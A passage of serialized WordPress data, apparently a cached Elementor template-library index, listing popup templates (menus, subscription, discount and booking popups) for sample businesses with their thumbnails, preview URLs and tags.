School\";s:9:\"thumbnail\";s:95:\"https://library.elementor.com/wp-content/uploads/2022/03/digital-design-tech-school-small-1.jpg\";s:12:\"tmpl_created\";i:1647773366;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:155:\"https://library.elementor.com/popups/full-screen-menu-digital-technology-design-school/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:8:\"[\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:61;a:16:{s:4:\"tmpl\";i:1344;s:2:\"id\";i:23015;s:5:\"title\";s:62:\"Bottom Bar | Contact | Digital &#038; Technology Design School\";s:9:\"thumbnail\";s:93:\"https://library.elementor.com/wp-content/uploads/2022/03/digital-design-tech-school-small.jpg\";s:12:\"tmpl_created\";i:1647773492;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:157:\"https://library.elementor.com/popups/bottom-bar-contact-digital-technology-design-school/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:10:\"bottom bar\";s:4:\"tags\";s:23:\"[\"Contact\",\"Portfolio\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:62;a:16:{s:4:\"tmpl\";i:1345;s:2:\"id\";i:23025;s:5:\"title\";s:32:\"Full Screen | Menu | Flower Shop\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/flower-shop-small.jpg\";s:12:\"tmpl_created\";i:1647773820;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/full-screen-menu-flower-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:21:\"[\"Fullscreen\",\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:63;a:16:{s:4:\"tmpl\";i:1346;s:2:\"id\";i:23037;s:5:\"title\";s:36:\"Classic | Subscription | Flower Shop\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2022/03/flower-shop-small-1.jpg\";s:12:\"tmpl_created\";i:1647773949;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:138:\"https://library.elementor.com/popups/classic-subscription-flower-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:24:\"[\"Discount\",\"Subscribe\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:64;a:16:{s:4:\"tmpl\";i:1347;s:2:\"id\";i:23056;s:5:\"title\";s:48:\"Classic | Discount | Health &#038; Fitness eBook\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/03/fitness-ebook-small-1.jpg\";s:12:\"tmpl_created\";i:1647774468;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:143:\"https://library.elementor.com/popups/classic-discount-health-fitness-ebook/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:23:\"[\"Contact\",\"Marketing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:65;a:16:{s:4:\"tmpl\";i:1348;s:2:\"id\";i:23067;s:5:\"title\";s:37:\"Fly-In | Menu | Baby Sleep Consultant\";s:9:\"thumbnail\";s:90:\"https://library.elementor.com/wp-content/uploads/2022/03/baby-sleep-consultant-small-1.jpg\";s:12:\"tmpl_created\";i:1647778954;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/popups/baby-sleep-consultant/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:8:\"[\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:66;a:16:{s:4:\"tmpl\";i:1349;s:2:\"id\";i:23077;s:5:\"title\";s:46:\"Classic | Subscription | Baby Sleep Consultant\";s:9:\"thumbnail\";s:88:\"https://library.elementor.com/wp-content/uploads/2022/03/baby-sleep-consultant-small.jpg\";s:12:\"tmpl_created\";i:1647779074;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:148:\"https://library.elementor.com/popups/classic-subscription-baby-sleep-consultant/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:12:\"[\"Discount\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:67;a:16:{s:4:\"tmpl\";i:1350;s:2:\"id\";i:23090;s:5:\"title\";s:33:\"Full Screen | Menu | Luxury Hotel\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2022/03/luxury-hotel-small.jpg\";s:12:\"tmpl_created\";i:1647779390;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:135:\"https://library.elementor.com/popups/full-screen-menu-luxury-hotel/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:21:\"[\"Fullscreen\",\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:68;a:16:{s:4:\"tmpl\";i:1351;s:2:\"id\";i:23100;s:5:\"title\";s:31:\"Fly-In | Booking | Luxury Hotel\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/luxury-hotel-small-1.jpg\";s:12:\"tmpl_created\";i:1647779500;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/fly-in-booking-luxury-hotel/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:20:\"[\"Booking\",\"Travel\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:69;a:16:{s:4:\"tmpl\";i:1352;s:2:\"id\";i:23109;s:5:\"title\";s:38:\"Full Screen | Menu | Design Conference\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2022/03/design-conference-35-small.jpg\";s:12:\"tmpl_created\";i:1647779675;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:140:\"https://library.elementor.com/popups/full-screen-menu-design-conference/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:21:\"[\"Fullscreen\",\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:70;a:16:{s:4:\"tmpl\";i:1353;s:2:\"id\";i:23120;s:5:\"title\";s:41:\"Full Screen | Booking | Design Conference\";s:9:\"thumbnail\";s:89:\"https://library.elementor.com/wp-content/uploads/2022/03/design-conference-35-small-1.jpg\";s:12:\"tmpl_created\";i:1647779793;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:143:\"https://library.elementor.com/popups/full-screen-booking-design-conference/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:35:\"[\"Booking\",\"Conference\",\"Creative\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:71;a:16:{s:4:\"tmpl\";i:1354;s:2:\"id\";i:23129;s:5:\"title\";s:29:\"Slide-In | Menu | VR Headsets\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2022/03/VR-headset-small.jpg\";s:12:\"tmpl_created\";i:1647781211;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/popups/slide-in-menu-vr-headsets/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:8:\"[\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:72;a:16:{s:4:\"tmpl\";i:1355;s:2:\"id\";i:23139;s:5:\"title\";s:31:\"Classic | Contact | VR Headsets\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2022/03/VR-headset-small-1.jpg\";s:12:\"tmpl_created\";i:1647781384;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/classic-contact-vr-headsets/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:11:\"[\"Contact\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:73;a:16:{s:4:\"tmpl\";i:1356;s:2:\"id\";i:23149;s:5:\"title\";s:38:\"Slide-In | Menu | Portrait Photography\";s:9:\"thumbnail\";s:89:\"https://library.elementor.com/wp-content/uploads/2022/03/48-portrair-photography-Menu.jpg\";s:12:\"tmpl_created\";i:1647782336;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:140:\"https://library.elementor.com/popups/slide-in-menu-portrait-photography/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:8:\"[\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:74;a:16:{s:4:\"tmpl\";i:1357;s:2:\"id\";i:23159;s:5:\"title\";s:47:\"Hello Bar | Subscription | Portrait Photography\";s:9:\"thumbnail\";s:97:\"https://library.elementor.com/wp-content/uploads/2022/03/48-portrair-photography-Subscription.jpg\";s:12:\"tmpl_created\";i:1647782478;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:149:\"https://library.elementor.com/popups/hello-bar-subscription-portrait-photography/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:34:\"[\"Blog\",\"Photography\",\"Subscribe\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:75;a:16:{s:4:\"tmpl\";i:1358;s:2:\"id\";i:23169;s:5:\"title\";s:32:\"Full Screen | Menu | English Pub\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2022/03/49-englisg-pub-Menu.jpg\";s:12:\"tmpl_created\";i:1647782664;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/full-screen-menu-english-pub/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:21:\"[\"Fullscreen\",\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:76;a:16:{s:4:\"tmpl\";i:1359;s:2:\"id\";i:23179;s:5:\"title\";s:32:\"Classic | Discount | English Pub\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/03/49-englisg-pub-Discount.jpg\";s:12:\"tmpl_created\";i:1647782796;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/classic-discount-english-pub/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:20:\"[\"Discount\",\"Offer\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:77;a:16:{s:4:\"tmpl\";i:1360;s:2:\"id\";i:23189;s:5:\"title\";s:27:\"Full Screen | Menu | Singer\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/58-Music-Artist-Menu.jpg\";s:12:\"tmpl_created\";i:1647783070;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:129:\"https://library.elementor.com/popups/full-screen-menu-singer/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:29:\"[\"Fullscreen\",\"menu\",\"Music\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:78;a:16:{s:4:\"tmpl\";i:1361;s:2:\"id\";i:23200;s:5:\"title\";s:31:\"Classic | Subscription | Singer\";s:9:\"thumbnail\";s:89:\"https://library.elementor.com/wp-content/uploads/2022/03/58-Music-Artist-Subscription.jpg\";s:12:\"tmpl_created\";i:1647783249;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/classic-subscription-singer/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:21:\"[\"Music\",\"Subscribe\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:79;a:16:{s:4:\"tmpl\";i:1362;s:2:\"id\";i:23210;s:5:\"title\";s:38:\"Full Screen | Menu | Virtual Assistant\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2022/03/virtual-assistnt-73-small.jpg\";s:12:\"tmpl_created\";i:1647784292;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:140:\"https://library.elementor.com/popups/full-screen-menu-virtual-assistant/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:21:\"[\"Fullscreen\",\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:80;a:16:{s:4:\"tmpl\";i:1363;s:2:\"id\";i:23223;s:5:\"title\";s:39:\"Hello Bar | Contact | Virtual Assistant\";s:9:\"thumbnail\";s:92:\"https://library.elementor.com/wp-content/uploads/2022/03/73-Virtual-Assistant-Contact-Us.jpg\";s:12:\"tmpl_created\";i:1647784616;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:141:\"https://library.elementor.com/popups/hello-bar-contact-virtual-assistant/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:37:\"[\"Contact\",\"Psychologist\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:81;a:16:{s:4:\"tmpl\";i:1364;s:2:\"id\";i:23234;s:5:\"title\";s:32:\"Slide-In  | Menu | Personal Chef\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/03/74-Personal-Chef-Menu.jpg\";s:12:\"tmpl_created\";i:1647798194;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/slide-in-menu-personal-chef/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:8:\"[\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:82;a:16:{s:4:\"tmpl\";i:1365;s:2:\"id\";i:23244;s:5:\"title\";s:29:\"Classic | CTA | Personal Chef\";s:9:\"thumbnail\";s:88:\"https://library.elementor.com/wp-content/uploads/2022/03/74-Personal-Chef-Contact-Us.jpg\";s:12:\"tmpl_created\";i:1647798297;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/popups/classic-cta-personal-chef/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:24:\"[\"Booking\",\"Chef\",\"cta\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:83;a:16:{s:4:\"tmpl\";i:1366;s:2:\"id\";i:23254;s:5:\"title\";s:31:\"Full Screen | Menu | Food Truck\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/03/food-truck-76-small-1.jpg\";s:12:\"tmpl_created\";i:1647798447;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/full-screen-menu-food-truck/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:21:\"[\"Fullscreen\",\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:84;a:16:{s:4:\"tmpl\";i:1367;s:2:\"id\";i:23265;s:5:\"title\";s:30:\"Fly-In | Discount | Food Truck\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2022/03/food-truck-76-small.jpg\";s:12:\"tmpl_created\";i:1647798657;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/fly-in-discount-food-truck/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:20:\"[\"Discount\",\"Offer\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:85;a:16:{s:4:\"tmpl\";i:1369;s:2:\"id\";i:23323;s:5:\"title\";s:28:\"Classic | CTA | Black Friday\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/Black-Friday-6-Small.jpg\";s:12:\"tmpl_created\";i:1647855505;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/popups/classic-cta-black-friday/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:34:\"[\"Black Friday\",\"cta\",\"Ecommerce\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:86;a:16:{s:4:\"tmpl\";i:1370;s:2:\"id\";i:23329;s:5:\"title\";s:29:\"Slide-In | CTA | Black Friday\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/Black-Friday-5-Small.jpg\";s:12:\"tmpl_created\";i:1647855865;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/popups/slide-in-cta-black-friday/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:34:\"[\"Black Friday\",\"cta\",\"Ecommerce\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:87;a:16:{s:4:\"tmpl\";i:1371;s:2:\"id\";i:23335;s:5:\"title\";s:31:\"Slide-In | CTA | Black Friday 1\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/Black-Friday-1-Small.jpg\";s:12:\"tmpl_created\";i:1647856357;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/slide-in-cta-black-friday-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:34:\"[\"Black Friday\",\"cta\",\"Ecommerce\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:88;a:16:{s:4:\"tmpl\";i:1372;s:2:\"id\";i:23341;s:5:\"title\";s:30:\"Classic | CTA | Black Friday 2\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/Black-Friday-3-Small.jpg\";s:12:\"tmpl_created\";i:1647856493;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/classic-cta-black-friday-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:34:\"[\"Black Friday\",\"cta\",\"Ecommerce\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:89;a:16:{s:4:\"tmpl\";i:1373;s:2:\"id\";i:23347;s:5:\"title\";s:30:\"Classic | CTA | Black Friday 3\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/Black-Friday-2-Small.jpg\";s:12:\"tmpl_created\";i:1647856891;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/classic-cta-black-friday-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:34:\"[\"Black Friday\",\"cta\",\"Ecommerce\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:90;a:16:{s:4:\"tmpl\";i:1374;s:2:\"id\";i:23354;s:5:\"title\";s:30:\"Classic | CTA | Black Friday 4\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/Black-Friday-4-Small.jpg\";s:12:\"tmpl_created\";i:1647856996;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/classic-cta-black-friday-4/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:34:\"[\"Black Friday\",\"cta\",\"Ecommerce\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:91;a:16:{s:4:\"tmpl\";i:1375;s:2:\"id\";i:23394;s:5:\"title\";s:27:\"Classic | CTA | Halloween 1\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/Halloween-3-Small.jpg\";s:12:\"tmpl_created\";i:1647857351;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:129:\"https://library.elementor.com/popups/classic-cta-halloween-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:31:\"[\"cta\",\"Ecommerce\",\"Halloween\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:92;a:16:{s:4:\"tmpl\";i:1376;s:2:\"id\";i:23401;s:5:\"title\";s:33:\"Slide-In | Discount | Halloween 2\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/Halloween-2-Small.jpg\";s:12:\"tmpl_created\";i:1647857567;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:135:\"https://library.elementor.com/popups/slide-in-discount-halloween-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:36:\"[\"Discount\",\"Ecommerce\",\"Halloween\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:93;a:16:{s:4:\"tmpl\";i:1377;s:2:\"id\";i:23407;s:5:\"title\";s:33:\"Slide-In | Discount | Halloween 3\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/Halloween-1-Small.jpg\";s:12:\"tmpl_created\";i:1647857814;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:135:\"https://library.elementor.com/popups/slide-in-discount-halloween-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:36:\"[\"Discount\",\"Ecommerce\",\"Halloween\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:94;a:16:{s:4:\"tmpl\";i:1378;s:2:\"id\";i:23416;s:5:\"title\";s:31:\"Fly-In | Discount | Halloween 